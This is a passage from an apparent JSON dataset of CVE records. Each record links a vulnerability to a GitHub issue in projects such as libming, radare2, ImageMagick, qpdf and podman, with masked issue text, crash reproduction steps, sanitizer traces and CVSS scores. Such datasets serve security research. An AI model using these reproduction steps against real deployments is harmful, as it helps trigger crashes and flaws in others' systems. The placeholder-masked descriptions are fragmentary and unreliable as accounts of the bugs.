  89422. "description": "Information Disclosure APITAG Authentication). I found a information leakage vulnerabilities in APITAG CMS, you need to login the backstage first. Steps to reproduce: APITAG in to the backstage URLTAG APITAG some contents APITAG the page and see APITAG create and publish APITAG and update FILETAG FILETAG FILETAG This vulnerability reveals the full path of bigtree CMS Let's look at the code: FILETAG The parameters of post are not restricted,so it will be evali it in wrong\u3002",
  89423. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
  89424. "severity": "LOW",
  89425. "baseScore": 2.7,
  89426. "impactScore": 1.4,
  89427. "exploitabilityScore": 1.2
  89428. },
  89429. {
  89430. "CVE_ID": "CVE-2018-20426",
  89431. "Issue_Url_old": "https://github.com/libming/libming/issues/162",
  89432. "Issue_Url_new": "https://github.com/libming/libming/issues/162",
  89433. "Repo_new": "libming/libming",
  89434. "Issue_Created_At": "2018-09-21T08:39:32Z",
  89435. "description": "Null pointer dereference in APITAG (decompile.c). A null pointer dereference bug was found in function APITAG (in master version,not the issue NUMBERTAG CODETAG to reproduce it ,run swftopython with APITAG APITAG poc file URLTAG credit: APITAG of Venustech FILETAG",
  89436. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89437. "severity": "HIGH",
  89438. "baseScore": 8.8,
  89439. "impactScore": 5.9,
  89440. "exploitabilityScore": 2.8
  89441. },
  89442. {
  89443. "CVE_ID": "CVE-2018-20428",
  89444. "Issue_Url_old": "https://github.com/libming/libming/issues/161",
  89445. "Issue_Url_new": "https://github.com/libming/libming/issues/161",
  89446. "Repo_new": "libming/libming",
  89447. "Issue_Created_At": "2018-09-21T08:24:35Z",
  89448. "description": "Null pointer dereference in strlenext (decompile.c). A null pointer dereference bug was found in function APITAG ERRORTAG to reproduce it ,run swftopython with APITAG APITAG poc file URLTAG credit: APITAG of Venustech FILETAG",
  89449. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89450. "severity": "HIGH",
  89451. "baseScore": 8.8,
  89452. "impactScore": 5.9,
  89453. "exploitabilityScore": 2.8
  89454. },
  89455. {
  89456. "CVE_ID": "CVE-2018-20429",
  89457. "Issue_Url_old": "https://github.com/libming/libming/issues/160",
  89458. "Issue_Url_new": "https://github.com/libming/libming/issues/160",
  89459. "Repo_new": "libming/libming",
  89460. "Issue_Created_At": "2018-09-21T03:21:35Z",
  89461. "description": "Null pointer dereference in APITAG (decompile.c). A null pointer dereference bug was found in function APITAG ERRORTAG to reproduce it ,run swftophp with APITAG APITAG poc file URLTAG credit: APITAG of Venustech FILETAG",
  89462. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89463. "severity": "HIGH",
  89464. "baseScore": 8.8,
  89465. "impactScore": 5.9,
  89466. "exploitabilityScore": 2.8
  89467. },
  89468. {
  89469. "CVE_ID": "CVE-2018-20437",
  89470. "Issue_Url_old": "https://github.com/wuyouzhuguli/FEBS-Shiro/issues/40",
  89471. "Issue_Url_new": "https://github.com/wuyouzhuguli/febs-shiro/issues/40",
  89472. "Repo_new": "wuyouzhuguli/FEBS-Shiro",
  89473. "Issue_Created_At": "2018-11-05T06:27:16Z",
  89474. "description": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e. APITAG Shiro\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e\uff0c\u8be6\u7ec6\u4fe1\u606f\u5982\u4e0b\uff1a FILETAG APITAG FILETAG FILETAG NUMBERTAG FILETAG APITAG",
  89475. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  89476. "severity": "HIGH",
  89477. "baseScore": 7.5,
  89478. "impactScore": 3.6,
  89479. "exploitabilityScore": 3.9
  89480. },
  89481. {
  89482. "CVE_ID": "CVE-2018-20455",
  89483. "Issue_Url_old": "https://github.com/radare/radare2/issues/12373",
  89484. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12373",
  89485. "Repo_new": "radareorg/radare2",
  89486. "Issue_Created_At": "2018-12-02T15:20:44Z",
  89487. "description": "APITAG stack buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes. ERRORTAG Steps to reproduce the behavior run APITAG",
  89488. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89489. "severity": "MEDIUM",
  89490. "baseScore": 5.5,
  89491. "impactScore": 3.6,
  89492. "exploitabilityScore": 1.8
  89493. },
  89494. {
  89495. "CVE_ID": "CVE-2018-20459",
  89496. "Issue_Url_old": "https://github.com/radare/radare2/issues/12418",
  89497. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12418",
  89498. "Repo_new": "radareorg/radare2",
  89499. "Issue_Created_At": "2018-12-05T16:26:17Z",
  89500. "description": "APITAG heap buffer overflow (OOB read) at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f2e NUMBERTAG c3 commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes. ERRORTAG Steps to reproduce the behavior compile radare with asan (tried O3/ O0) run APITAG FILETAG Additional Logs, screenshots, source code, configuration dump, ... Index j may reach length of str inside APITAG .",
  89501. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89502. "severity": "MEDIUM",
  89503. "baseScore": 5.5,
  89504. "impactScore": 3.6,
  89505. "exploitabilityScore": 1.8
  89506. },
  89507. {
  89508. "CVE_ID": "CVE-2018-20545",
  89509. "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/37",
  89510. "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/37",
  89511. "Repo_new": "cacalabs/libcaca",
  89512. "Issue_Created_At": "2018-12-29T03:23:35Z",
  89513. "description": "CVETAG . Following vulnerability has been reported to Red Hat issue tracker: CVETAG CVETAG ERRORTAG",
  89514. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89515. "severity": "HIGH",
  89516. "baseScore": 8.8,
  89517. "impactScore": 5.9,
  89518. "exploitabilityScore": 2.8
  89519. },
  89520. {
  89521. "CVE_ID": "CVE-2018-20570",
  89522. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/191",
  89523. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/191",
  89524. "Repo_new": "jasper-software/jasper",
  89525. "Issue_Created_At": "2018-12-28T07:22:38Z",
  89526. "description": "Heap buffer overflow in APITAG at jasper version NUMBERTAG and master branch. A crafted input will lead to heap buffer overflow failed in APITAG at jasper version NUMBERTAG and master branch Triggered by ./jasper output /dev/null output format jp2 input PATHTAG Poc FILETAG The ASAN information is as follows: ERRORTAG APITAG wu.an. EMAILTAG",
  89527. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89528. "severity": "MEDIUM",
  89529. "baseScore": 6.5,
  89530. "impactScore": 3.6,
  89531. "exploitabilityScore": 2.8
  89532. },
  89533. {
  89534. "CVE_ID": "CVE-2018-20622",
  89535. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/193",
  89536. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/193",
  89537. "Repo_new": "jasper-software/jasper",
  89538. "Issue_Created_At": "2018-12-31T06:29:37Z",
  89539. "description": "memory leaks in jpc_dec_decodepkts . hi,jasper team,when i convert jp2 file,i found a memory leak bug reported by APITAG the version is NUMBERTAG FILETAG ./jasper input jasper jpc_dec_decodepkts memory leak output /dev/null output format jp2 warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) alignment failed jpc_dec_decodepkts failed error: cannot decode code stream error: cannot load image data APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de8b1b0 ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b 
NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG NUMBERTAG f2b6de NUMBERTAG e5 ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG f ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG e5 ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG NUMBERTAG f2b6de NUMBERTAG f ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de8b1b0 ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6df3c NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
  89540. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89541. "severity": "MEDIUM",
  89542. "baseScore": 6.5,
  89543. "impactScore": 3.6,
  89544. "exploitabilityScore": 2.8
  89545. },
  89546. {
  89547. "CVE_ID": "CVE-2018-20756",
  89548. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14105",
  89549. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14105",
  89550. "Repo_new": "modxcms/revolution",
  89551. "Issue_Created_At": "2018-10-02T04:21:54Z",
  89552. "description": "Stored XSS via document resources. Create new document with pagetitle ERRORTAG XSS work in: Update Quick edit View manager logs",
  89553. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89554. "severity": "MEDIUM",
  89555. "baseScore": 6.1,
  89556. "impactScore": 2.7,
  89557. "exploitabilityScore": 2.8
  89558. },
  89559. {
  89560. "CVE_ID": "CVE-2018-20847",
  89561. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/431",
  89562. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/431",
  89563. "Repo_new": "uclouvain/openjpeg",
  89564. "Issue_Created_At": "2014-11-14T19:45:14Z",
  89565. "description": "Heap buffer overflow in opj_tcd_init_decode_tile. Originally reported on Google Code with ID NUMBERTAG ERRORTAG Reported by mayeut URLTAG on NUMBERTAG",
  89566. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89567. "severity": "HIGH",
  89568. "baseScore": 8.8,
  89569. "impactScore": 5.9,
  89570. "exploitabilityScore": 2.8
  89571. },
  89572. {
  89573. "CVE_ID": "CVE-2018-3769",
  89574. "Issue_Url_old": "https://github.com/ruby-grape/grape/issues/1762",
  89575. "Issue_Url_new": "https://github.com/ruby-grape/grape/issues/1762",
  89576. "Repo_new": "ruby-grape/grape",
  89577. "Issue_Created_At": "2018-05-22T22:25:38Z",
  89578. "description": "Default formatter error can cause XSS rendering issue. If you issue a request into an API endpoint with a format specified that is not handled, you get back a NUMBERTAG error with message APITAG requested format 'format' is not supported.' The name of the specified format is rendered in the error message, which defaults as HTML. You can easily craft a format value that gets passed in and renders as an XSS. An example: URLTAG Renders as html: The requested format APITAG APITAG ' is not supported. Which will cause a javascript popup if you visit this page in a browser.",
  89579. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89580. "severity": "MEDIUM",
  89581. "baseScore": 6.1,
  89582. "impactScore": 2.7,
  89583. "exploitabilityScore": 2.8
  89584. },
  89585. {
  89586. "CVE_ID": "CVE-2018-6013",
  89587. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/327",
  89588. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/327",
  89589. "Repo_new": "bigtreecms/bigtree-cms",
  89590. "Issue_Created_At": "2018-01-22T13:47:05Z",
  89591. "description": "Cross site Scripting in bigtreecms NUMBERTAG FILE: PATHTAG Vul Code: $parts = APITAG > APITAG = $part; > $directory = APITAG > APITAG APITAG APITAG APITAG POST PATHTAG xxx: xxx xxx: xxx xxx: xxx APITAG APITAG",
  89592. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  89593. "severity": "MEDIUM",
  89594. "baseScore": 5.4,
  89595. "impactScore": 2.7,
  89596. "exploitabilityScore": 2.3
  89597. },
  89598. {
  89599. "CVE_ID": "CVE-2018-6535",
  89600. "Issue_Url_old": "https://github.com/Icinga/icinga2/issues/4920",
  89601. "Issue_Url_new": "https://github.com/icinga/icinga2/issues/4920",
  89602. "Repo_new": "icinga/icinga2",
  89603. "Issue_Created_At": "2017-01-13T08:55:05Z",
  89604. "description": "APITAG NUMBERTAG Hash API password and use time constant password compares. This issue has been migrated from Redmine: URLTAG Created by jflach on NUMBERTAG Assignee: _jflach_ Status: APITAG Target Version: _(none)_ Last Update NUMBERTAG in Redmine)_ Backport?: Not yet backported Include in Changelog NUMBERTAG API user credentials are compared using the != operator on APITAG which maps directly to the != operator of std::string which is not guaranteed to be constant time and thus is likely vulnerable to timing attacks. An alternative to making the comparision time constant would be always save the API passwords hashed.",
  89605. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89606. "severity": "HIGH",
  89607. "baseScore": 8.1,
  89608. "impactScore": 5.9,
  89609. "exploitabilityScore": 2.2
  89610. },
  89611. {
  89612. "CVE_ID": "CVE-2018-9058",
  89613. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/93",
  89614. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/93",
  89615. "Repo_new": "ckolivas/lrzip",
  89616. "Issue_Created_At": "2018-03-27T03:22:20Z",
  89617. "description": "infinite loop in runzip_fd (src/runzip.c). On latest version APITAG and commit APITAG of lrzip, there is an infinite loop in runzip_fd function of src/runzip.c, which could be triggered by the POC below. The issue happens since the return value of runzip_chunk (line NUMBERTAG function could be manipulated to be NUMBERTAG In this case, total is always smaller than expected_size NUMBERTAG i NUMBERTAG runzip_fd(rzip_control control, int fd_in, int fd_out, int fd_hist, i NUMBERTAG expected_size NUMBERTAG do NUMBERTAG u = runzip_chunk(control, fd_in, expected_size, total NUMBERTAG total += u NUMBERTAG while (total APITAG eof NUMBERTAG return total NUMBERTAG To reproduce the issue, run: ./lrzip t $POC FILETAG The full stack trace is NUMBERTAG fe NUMBERTAG fb NUMBERTAG in _fxstat () from APITAG NUMBERTAG ae NUMBERTAG in fstat (__statbuf NUMBERTAG fffffffd2a0, __fd NUMBERTAG at PATHTAG NUMBERTAG runzip_chunk (tally NUMBERTAG expected_size=<optimized out>, fd_in=<optimized out>, control=<optimized out>) at PATHTAG NUMBERTAG runzip_fd APITAG APITAG , fd_in=fd_in APITAG fd_out=fd_out APITAG fd_hist=fd_hist APITAG expected_size=<optimized out>) at PATHTAG NUMBERTAG in decompress_file (control NUMBERTAG b4cc0 APITAG ) at PATHTAG NUMBERTAG in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG",
  89618. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89619. "severity": "MEDIUM",
  89620. "baseScore": 5.5,
  89621. "impactScore": 3.6,
  89622. "exploitabilityScore": 1.8
  89623. },
  89624. {
  89625. "CVE_ID": "CVE-2018-9133",
  89626. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1072",
  89627. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1072",
  89628. "Repo_new": "imagemagick/imagemagick",
  89629. "Issue_Created_At": "2018-03-29T21:02:01Z",
  89630. "description": "Excessive iteration in APITAG and APITAG ( PATHTAG ). Version: APITAG NUMBERTAG Q NUMBERTAG Commit: APITAG OS: Linux test NUMBERTAG APITAG NUMBERTAG SMP Fri Feb NUMBERTAG UTC NUMBERTAG APITAG There is a excessive iteration in APITAG and APITAG function of PATHTAG file, which could be triggered by the POC below. The issue happens since APITAG and APITAG assume legitimate values of image >rows and image >columns. Once such values are manipulated to be large, imagemagick hangs: Imagemagick spends more than ten minutes to process the POC, which is only NUMBERTAG bytes. To reproduce the issue: run ./mogrify $POC POC is attached. FILETAG Stack trace when imagemagick is in APITAG loop NUMBERTAG fe NUMBERTAG f6ebac in APITAG APITAG APITAG at PATHTAG NUMBERTAG fe NUMBERTAG f NUMBERTAG in APITAG (image_info=<optimized out>, exception=<optimized out>) at PATHTAG NUMBERTAG fe NUMBERTAG c in APITAG APITAG APITAG at PATHTAG NUMBERTAG fe NUMBERTAG e5 in APITAG APITAG APITAG PATHTAG APITAG at PATHTAG NUMBERTAG fe NUMBERTAG a1dd6e in APITAG (image_info NUMBERTAG argc=<optimized out>, argv=<optimized out>, APITAG out>, exception=<optimized out>) at PATHTAG NUMBERTAG fe NUMBERTAG ea NUMBERTAG in APITAG APITAG command=<optimized out>, argc=argc APITAG argv=<optimized out>, metadata=<optimized out>, APITAG at PATHTAG NUMBERTAG in APITAG (argc NUMBERTAG argv=<optimized out>) at PATHTAG NUMBERTAG fe NUMBERTAG f8c2c NUMBERTAG in __libc_start_main () at PATHTAG NUMBERTAG ac2 in _start ()",
  89631. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89632. "severity": "MEDIUM",
  89633. "baseScore": 6.5,
  89634. "impactScore": 3.6,
  89635. "exploitabilityScore": 2.8
  89636. },
  89637. {
  89638. "CVE_ID": "CVE-2018-9918",
  89639. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/202",
  89640. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/202",
  89641. "Repo_new": "qpdf/qpdf",
  89642. "Issue_Created_At": "2018-04-10T10:00:25Z",
  89643. "description": "Segmentation Fault (stack overflow) on a crafted PDF file. A crafted pdf file causes a segmentation fault, stack overflow reported by LLVM APITAG causing a denial of service and there is a chance of code execution. FILETAG Details are attached inside the zip called 'gdb log'. I have tested with libqpdf and qpdf itself, debugged and used LLVM APITAG to identify the possible root cause. A pdf POC is inside the zip. Versions tested NUMBERTAG and NUMBERTAG c code to test: APITAG running: > == simple source code using libqpdf == > $ cat openpdf.cc > include APITAG > include APITAG > include APITAG > include APITAG > include APITAG > include APITAG > > int main(void) > { > int pageno NUMBERTAG try > { > QPDF pdf; > APITAG FILETAG \"); > APITAG pages = APITAG > if ((pageno NUMBERTAG static_cast APITAG (pageno) > APITAG > { > exit NUMBERTAG catch (std::exception& e) > { > return NUMBERTAG return NUMBERTAG clang NUMBERTAG PATHTAG lz ljpeg lqpdf lpthread .cc g o openpdf > $ ./openpdf > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > (...) 
> WARNING: FILETAG (trailer, offset NUMBERTAG unknown token while reading object; treating as string > WARNING: FILETAG (trailer, offset NUMBERTAG unexpected EOF > WARNING: FILETAG (trailer, offset NUMBERTAG parse error while reading object > Segmentation fault (core dumped) Testing qpdf NUMBERTAG pushdword MENTIONTAG qpdflib]$ qpdf FILETAG test.pdf > Segmentation fault (core dumped) > [pushdword MENTIONTAG qpdflib]$ qpdf version > qpdf version NUMBERTAG Copyright (c NUMBERTAG Jay Berkenbilt > This software may be distributed under the terms of version NUMBERTAG of the > Artistic License which may be found in the source distribution. It is > provided \"as is\" without express or implied warranty. testing qpdf NUMBERTAG qpdf FILETAG test.pdf > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > (... a very long warning repetition ...) > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG unknown token while reading object; treating as string > WARNING: FILETAG (trailer, offset NUMBERTAG unexpected EOF > WARNING: fuzzed.pdf (trailer, offset NUMBERTAG parse error while reading object > Segmentation fault (core dumped)",
  89644. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89645. "severity": "HIGH",
  89646. "baseScore": 7.8,
  89647. "impactScore": 5.9,
  89648. "exploitabilityScore": 1.8
  89649. },
  89650. {
  89651. "CVE_ID": "CVE-2019-10062",
  89652. "Issue_Url_old": "https://github.com/aurelia/framework/issues/992",
  89653. "Issue_Url_new": "https://github.com/aurelia/framework/issues/992",
  89654. "Repo_new": "aurelia/framework",
  89655. "Issue_Created_At": "2022-03-01T14:53:13Z",
  89656. "description": "npm audit warning for aurelia framework XSS vulnerability in default HTML sanitizer implementation. I'm submitting a security vulnerability audit report Library Version: aurelia framework NUMBERTAG Please tell us about your environment: Operating System: Windows NUMBERTAG N/A) Node Version NUMBERTAG LTS) NPM Version NUMBERTAG LTS) Aurelia CLI OR JSPM OR Webpack AND Version N/A Browser: N/A Language: all Current behavior: When installing Aurelia NUMBERTAG APITAG ) using npm , audit warnings are displayed, with reference to this vulnerability description URLTAG . The Aurelia products developed by my company are not really affected since we have implemented our own improved Aurelia APITAG package (stored on our internal npm repository). We use this as replacement for the default, limited sanitizer implementation included with APITAG (as recommended in your documentation pages). Our sanitizer package is a pure ESM package that works both in browser AND node (using jsdom ) environments, and it is configurable by \"allow listing\" html element names/attributes per element type, and also inline CSS style properties... CODETAG If it is of interest, I could ask if it is OK to make the source code for our sanitizer package public, so that you could review/test it. Then we could discuss making the package public, or if you prefer dissecting the code to make it an integral part of the aurelia framework source code, we could maybe \"donate\" the code for this purpose as well. I would need some confirmations from management first though. Whatever you prefer, I think something should be done to get rid of the vulnerability audit warnings. Awaiting reply. Expected/desired behavior: Aurelia NUMBERTAG should mitigate the vulnerability by including a better html sanitization feature to get rid of audit warnings when installed from npm repository.",
  89657. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89658. "severity": "MEDIUM",
  89659. "baseScore": 6.1,
  89660. "impactScore": 2.7,
  89661. "exploitabilityScore": 2.8
  89662. },
  89663. {
  89664. "CVE_ID": "CVE-2019-1010069",
  89665. "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/18",
  89666. "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/18",
  89667. "Repo_new": "lewdlime/abcm2ps",
  89668. "Issue_Created_At": "2018-04-13T18:42:10Z",
  89669. "description": "access violation APITAG in txt_add(unsigned char s, int sz). URLTAG (gdb) set args POC4 (gdb) r abcm2ps NUMBERTAG File POC4 Line NUMBERTAG Empty line in tune header K:C added Program received signal SIGSEGV, Segmentation fault. __memcpy_avx_unaligned () at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG d NUMBERTAG e3 in __memcpy_avx_unaligned () at PATHTAG NUMBERTAG e1b5b in txt_add (__len NUMBERTAG src NUMBERTAG f3e, __dest=<optimized out>) at PATHTAG NUMBERTAG e1b5b in txt_add (s NUMBERTAG f3e \"\", sz NUMBERTAG at APITAG NUMBERTAG e NUMBERTAG a in frontend (s=<optimized out>, s APITAG PATHTAG PATHTAG PATHTAG OB NUMBERTAG W PATHTAG PATHTAG \", ftype=ftype APITAG fname=fname APITAG \"POC4\", linenum NUMBERTAG linenum APITAG at APITAG NUMBERTAG b NUMBERTAG d in treat_file (fn=<optimized out>, ext=<optimized out>) at APITAG NUMBERTAG f9 in main (argc NUMBERTAG argv=<optimized out>) at APITAG",
  89670. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89671. "severity": "MEDIUM",
  89672. "baseScore": 5.5,
  89673. "impactScore": 3.6,
  89674. "exploitabilityScore": 1.8
  89675. },
  89676. {
  89677. "CVE_ID": "CVE-2019-10152",
  89678. "Issue_Url_old": "https://github.com/containers/libpod/issues/3211",
  89679. "Issue_Url_new": "https://github.com/containers/podman/issues/3211",
  89680. "Repo_new": "containers/podman",
  89681. "Issue_Created_At": "2019-05-28T15:33:18Z",
  89682. "description": "Podman cp dereferences symlinks in host context. Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line) /kind bug Description When copying into a path in a container that contains a symlink, the symlink is resolved on the host, not within the container, Steps to reproduce the issue NUMBERTAG APITAG NUMBERTAG Inside the container: APITAG NUMBERTAG Outside the container: APITAG NUMBERTAG In the container, APITAG NUMBERTAG Outside the container, APITAG Describe the results you received: Testfile is created outside the container Describe the results you expected: Testfile is created inside the container Additional information you deem important (e.g. issue happens only occasionally): Output of podman version : Latest master",
  89683. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N",
  89684. "severity": "HIGH",
  89685. "baseScore": 7.2,
  89686. "impactScore": 5.8,
  89687. "exploitabilityScore": 0.8
  89688. },
  89689. {
  89690. "CVE_ID": "CVE-2019-10742",
  89691. "Issue_Url_old": "https://github.com/axios/axios/issues/1098",
  89692. "Issue_Url_new": "https://github.com/axios/axios/issues/1098",
  89693. "Repo_new": "axios/axios",
  89694. "Issue_Created_At": "2017-09-22T06:34:42Z",
  89695. "description": "Download continues after APITAG exceeded. \u00a0Summary The following code demonstrates the issue: CODETAG Expected behavior: The script exits immediately after printing ERRORTAG APITAG size of NUMBERTAG exceeded\" Not much more than NUMBERTAG KB was downloaded from the server Actual behavior: The script prints ERRORTAG APITAG size of NUMBERTAG exceeded\", then continues to download the remaining NUMBERTAG MB of data from the server. It takes about two minutes before it exits on my connection. It's possible to work around this by adding a cancellation token and manually canceling the request when an error is encountered. However, since the request never actually fires a \"complete\" event, it's surprising that the download continues, only to have the data be thrown into the void. \u00a0Context axios version NUMBERTAG Environment: node NUMBERTAG APITAG Sierra NUMBERTAG",
  89696. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89697. "severity": "HIGH",
  89698. "baseScore": 7.5,
  89699. "impactScore": 3.6,
  89700. "exploitabilityScore": 3.9
  89701. },
  89702. {
